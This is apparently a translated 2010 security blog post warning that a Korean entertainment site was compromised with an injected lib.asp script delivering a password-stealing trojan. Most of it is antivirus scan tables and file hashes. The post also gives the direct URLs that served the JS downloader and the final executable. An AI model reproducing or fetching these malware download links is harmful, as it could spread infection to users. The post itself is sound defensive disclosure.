CAT-QuickHeal 10.00 2010.05.15 (Suspicious) - DNAScan
ClamAV 0.96.0.3-git 2010.05.16 -
Comodo 4859 2010.05.16 TrojWare.Win32.Trojan.Agent.Gen
DrWeb 5.0.2.03300 2010.05.17 -
eSafe 7.0.17.0 2010.05.16 -
eTrust-Vet 35.2.7490 2010.05.15 -
F-Prot 4.5.1.85 2010.05.16 -
F-Secure 9.0.15370.0 2010.05.17 Trojan.Peed.Gen
Fortinet 4.1.133.0 2010.05.16 -
GData 21 2010.05.17 Trojan.Peed.Gen
Ikarus T3.1.1.84.0 2010.05.17 Trojan.Peed
Jiangmin 13.0.900 2010.05.16 -
Kaspersky 7.0.0.125 2010.05.17 Trojan.Win32.Pincav.aack
McAfee 5.400.0.1158 2010.05.17 PWS-Mmorpg!pd
McAfee-GW-Edition 2010.1 2010.05.16 Heuristic.LooksLike.Heuristic.BehavesLike.Win32.Downloader.B
Microsoft 1.5703 2010.05.17 Trojan:Win32/Malagent
NOD32 5119 2010.05.17 a variant of Win32/Kryptik.DXI
Norman 6.04.12 2010.05.16 -
nProtect 2010-05-16.01 2010.05.16 Trojan.Peed.Gen
Panda 10.0.2.7 2010.05.16 Trj/CI.A
PCTools 7.0.3.5 2010.05.17 -
Prevx 3.0 2010.05.17 High Risk Cloaked Malware
Rising 22.47.06.04 2010.05.16 Trojan.Win32.Generic.5204B11E
Sophos 4.53.0 2010.05.17 Sus/UnkPack-C
Sunbelt 6311 2010.05.17 Trojan.Win32.Generic!BT
Symantec 20101.1.0.89 2010.05.17 -
TheHacker 6.5.2.0.280 2010.05.14 -
TrendMicro 9.120.0.1004 2010.05.16 PAK_Generic.001
TrendMicro-HouseCall 9.120.0.1004 2010.05.17 -
VBA32 3.12.12.5 2010.05.14 Malware-Dropper.Win32.Inject.gen
ViRobot 2010.5.15.2318 2010.05.16 -
VirusBuster 5.0.27.0 2010.05.16 -
 
Additional information
File size: 53248 bytes
MD5...: 7a605076c916dbe48c3e4dd67411a643
SHA1..: f64ee054a392de9e98f3f8b22fe7d5c39e18bc37
SHA256: 4b9a72252ab86d78c804287400ddff1e0b31c7de5b8b6c523d2953856f844dd0
Scanned file: 1.exe_xor Submitted: 2010.05.17 01:32:39 (UTC)
Antivirus Engine version Definition date Result
a-squared 4.5.0.50 2010.05.10 -
AhnLab-V3 2010.05.16.00 2010.05.15 ASD.Prevention
AntiVir 8.2.1.242 2010.05.16 TR/Downloader.Gen
Antiy-AVL 2.0.3.7 2010.05.14 -
Authentium 5.2.0.5 2010.05.16 -
Avast 4.8.1351.0 2010.05.16 Win32:Rootkit-gen
Avast5 5.0.332.0 2010.05.16 Win32:Rootkit-gen
AVG 9.0.0.787 2010.05.16 Win32/PEPatch.BM
BitDefender 7.2 2010.05.17 Generic.Malware.FBg.5DCBA1EB
CAT-QuickHeal 10.00 2010.05.15 (Suspicious) - DNAScan
ClamAV 0.96.0.3-git 2010.05.16 -
Comodo 4859 2010.05.16 -
DrWeb 5.0.2.03300 2010.05.17 Trojan.PWS.Wsgame.20571
eSafe 7.0.17.0 2010.05.16 Suspicious File
eTrust-Vet 35.2.7490 2010.05.15 -
F-Prot 4.5.1.85 2010.05.16 -
F-Secure 9.0.15370.0 2010.05.17 Generic.Malware.FBg.5DCBA1EB
Fortinet 4.1.133.0 2010.05.16 -
GData 21 2010.05.17 Win32:Rootkit-gen
Ikarus T3.1.1.84.0 2010.05.17 Win32.SuspectCrc
Jiangmin 13.0.900 2010.05.16 -
Kaspersky 7.0.0.125 2010.05.17 -
McAfee 5.400.0.1158 2010.05.17 Suspect-02!4C073148EB0A
McAfee-GW-Edition 2010.1 2010.05.16 Artemis!4C073148EB0A
Microsoft 1.5703 2010.05.17 Trojan:Win32/Meredrop
NOD32 5119 2010.05.17 -
Norman 6.04.12 2010.05.16 -
nProtect 2010-05-16.01 2010.05.16 -
Panda 10.0.2.7 2010.05.16 Suspicious file
PCTools 7.0.3.5 2010.05.17 -
Prevx 3.0 2010.05.17 -
Rising 22.47.06.04 2010.05.16 -
Sophos 4.53.0 2010.05.17 Mal/Behav-112
Sunbelt 6311 2010.05.17 -
Symantec 20101.1.0.89 2010.05.17 -
TheHacker 6.5.2.0.280 2010.05.14 -
TrendMicro 9.120.0.1004 2010.05.16 PAK_Generic.001
TrendMicro-HouseCall 9.120.0.1004 2010.05.17 -
VBA32 3.12.12.5 2010.05.14 Malware-Cryptor.Win32.Krap
ViRobot 2010.5.15.2318 2010.05.16 -
VirusBuster 5.0.27.0 2010.05.16 -
 
Additional information
File size: 20480 bytes
MD5...: 4c073148eb0ada6ca31e43816d1d402c
SHA1..: c02449696c974ddde708f3e7afc1c573380e99c5
SHA256: 4ec7b8fa64f0cffa559c0f765816f99426bb5f6b1f8341d87e01b5439afed77f

Related post: Pruna Movie Search is distributing malware !!


posted by Kwan's 2010. 5. 12. 18:20
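CJ Entertainment, which I found to be compromised three weeks ago, still carries malicious code today, so I am posting this.
Inspecting the site with a tool shows that the malicious lib.asp has been inserted, as seen here.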



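Inside the JS file you can find a file named lib.asp. When it is opened in Internet Explorer, it again disguises itself by returning the text "time out".
Decoding this file once more reveals the final file, an exe.
It is still being distributed as I write this, so this site needs to be treated with great caution.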

The server that serves the final file is also still alive, so be very careful with it.

lib.asp : http://61.100.7.171/cxx/lib.asp0
Final file : http://61.100.1.93/cxx/isa.exe0

The file can still be downloaded now. Finally, be careful with this site!

Scanned file: lib.asp Submitted: 2010.05.10 00:38:59 (UTC)
Antivirus Engine version Definition date Result
a-squared 4.5.0.50 2010.05.09 Virus.JS.Downloader.QJ!IK
AhnLab-V3 2010.05.09.00 2010.05.08 JS/Downloader
AntiVir 8.2.1.236 2010.05.09 JS/Drop.A.5851
Antiy-AVL 2.0.3.7 2010.05.07 -
Authentium 5.2.0.5 2010.05.09 -
Avast 4.8.1351.0 2010.05.09 JS:Downloader-QJ
Avast5 5.0.332.0 2010.05.09 JS:Downloader-QJ
AVG 9.0.0.787 2010.05.09 Script/Exploit
BitDefender 7.2 2010.05.10 Trojan.Script.407264
CAT-QuickHeal 10.00 2010.05.08 -
ClamAV 0.96.0.3-git 2010.05.09 -
Comodo 4800 2010.05.09 -
DrWeb 5.0.2.03300 2010.05.10 -
eSafe 7.0.17.0 2010.05.09 -
eTrust-Vet None 2010.05.07 -
F-Prot 4.5.1.85 2010.05.09 JS/Crypted.GA.gen
F-Secure 9.0.15370.0 2010.05.10 Trojan.Script.407264
Fortinet 4.1.133.0 2010.05.09 -
GData 21 2010.05.10 Trojan.Script.407264
Ikarus T3.1.1.84.0 2010.05.09 Virus.JS.Downloader.QJ
Jiangmin 13.0.900 2010.05.09 -
Kaspersky 7.0.0.125 2010.05.09 Trojan-Downloader.JS.Agent.fhk
McAfee 5.400.0.1158 2010.05.09 -
McAfee-GW-Edition 2010.1 2010.05.09 Heuristic.BehavesLike.JS.Exploit.A
Microsoft 1.5703 2010.05.09 -
NOD32 5099 2010.05.10 -
Norman 6.04.12 2010.05.09 -
nProtect 2010-05-09.01 2010.05.09 Trojan.Script.407264
Panda 10.0.2.7 2010.05.09 -
PCTools 7.0.3.5 2010.05.07 -
Prevx 3.0 2010.05.10 -
Rising 22.46.06.04 2010.05.09 Trojan.DL.Script.JS.Agent.qx
Sophos 4.53.0 2010.05.09 JS/Agent-MZX
Sunbelt 6283 2010.05.10 -
Symantec 20091.2.0.41 2010.05.10 -
TheHacker 6.5.2.0.277 2010.05.09 -
TrendMicro 9.120.0.1004 2010.05.09 -
TrendMicro-HouseCall 9.120.0.1004 2010.05.10 -
VBA32 3.12.12.4 2010.05.06 -
ViRobot 2010.5.8.2306 2010.05.09 JS.S.Agent.5851
VirusBuster 5.0.27.0 2010.05.09 -
 
Additional information
File size: 5851 bytes
MD5   : 51e7b5fe2fa7ef45de3b3671ba91b011
SHA1  : e6e7dd63b6de5b8b24c5a91d001d23a01de8186b
SHA256: 1d373a0cd0b239795370655695fb7db3138ab1aa1a4cb4df676f72150d82a7b9
Scanned file: isa.exe Submitted: 2010.05.10 00:46:48 (UTC)
Antivirus Engine version Definition date Result
a-squared 4.5.0.50 2010.05.09 Trojan.Peed!IK
AhnLab-V3 2010.05.09.00 2010.05.08 Win-Trojan/Pincav.54784.U
AntiVir 8.2.1.236 2010.05.09 TR/Crypt.ZPACK.Gen
Antiy-AVL 2.0.3.7 2010.05.07 Trojan/Win32.Pincav.gen
Authentium 5.2.0.5 2010.05.09 -
Avast 4.8.1351.0 2010.05.09 Win32:Malware-gen
Avast5 5.0.332.0 2010.05.09 Win32:Malware-gen
AVG 9.0.0.787 2010.05.09 Generic17.BKEJ
BitDefender 7.2 2010.05.10 Trojan.Peed.Gen
CAT-QuickHeal 10.00 2010.05.08 Trojan.Pincav.ywu
ClamAV 0.96.0.3-git 2010.05.09 -
Comodo 4800 2010.05.09 TrojWare.Win32.Trojan.Agent.Gen
DrWeb 5.0.2.03300 2010.05.10 Trojan.Siggen1.24430
eSafe 7.0.17.0 2010.05.09 Win32.PWS.Mmorpg
eTrust-Vet 35.2.7474 2010.05.07 -
F-Prot 4.5.1.85 2010.05.09 -
F-Secure 9.0.15370.0 2010.05.10 Trojan.Peed.Gen
Fortinet 4.1.133.0 2010.05.09 W32/Pincav.YWU!tr
GData 21 2010.05.10 Trojan.Peed.Gen
Ikarus T3.1.1.84.0 2010.05.10 Trojan.Peed
Jiangmin 13.0.900 2010.05.09 Trojan/Pincav.eta
Kaspersky 7.0.0.125 2010.05.09 Trojan.Win32.Pincav.ywu
McAfee 5.400.0.1158 2010.05.09 PWS-Mmorpg!oq
McAfee-GW-Edition 2010.1 2010.05.09 Heuristic.LooksLike.Heuristic.BehavesLike.Win32.Downloader.B
Microsoft 1.5703 2010.05.09 Trojan:Win32/Malagent
NOD32 5099 2010.05.10 Win32/PSW.Gamania.NCP
Norman 6.04.12 2010.05.09 -
nProtect 2010-05-09.01 2010.05.09 Trojan.Peed.Gen
Panda 10.0.2.7 2010.05.09 Generic Trojan
PCTools 7.0.3.5 2010.05.07 -
Prevx 3.0 2010.05.10 High Risk Cloaked Malware
Rising 22.46.06.04 2010.05.09 Trojan.Win32.Generic.5202C6D7
Sophos 4.53.0 2010.05.09 Troj/Dload-HL
Sunbelt 6283 2010.05.10 Trojan.Win32.Generic!BT
Symantec 20091.2.0.41 2010.05.10 -
TheHacker 6.5.2.0.277 2010.05.10 Trojan/Pincav.ywu
TrendMicro 9.120.0.1004 2010.05.09 TSPY_MAGANIA.KI
TrendMicro-HouseCall 9.120.0.1004 2010.05.10 TSPY_MAGANIA.KI
VBA32 3.12.12.4 2010.05.06 Malware-Dropper.Win32.Inject.gen
ViRobot 2010.5.8.2306 2010.05.09 Trojan.Win32.Pincav.54784.C
VirusBuster 5.0.27.0 2010.05.09 Trojan.PWS.Gamania.BBV
 
Additional information
File size: 54784 bytes
MD5...: a19b540af7132a86e866be1152256f07
SHA1..: 77715cc29b8911598f5f43bb0b17687267ea75f5
SHA256: 1d109b0ebfebc3d3c960bb7e4ef2917d64c4fef515ab031f1f15d522f0aa7fde

box.exe ~> V3 : Win-Trojan/Magania.53248.AA (added: 2010.05.07.07)
isa.exe ~> V3 : Win-Trojan/Pincav.54784.U (added: 2010.05.01.00)

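As shown above, as a result of the reports submitted, antivirus products now all detect these files.
It is best to avoid sites like this unless they are in a safe state.
Any harm that comes from running these files out of curiosity is entirely the responsibility of the person who ran them.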

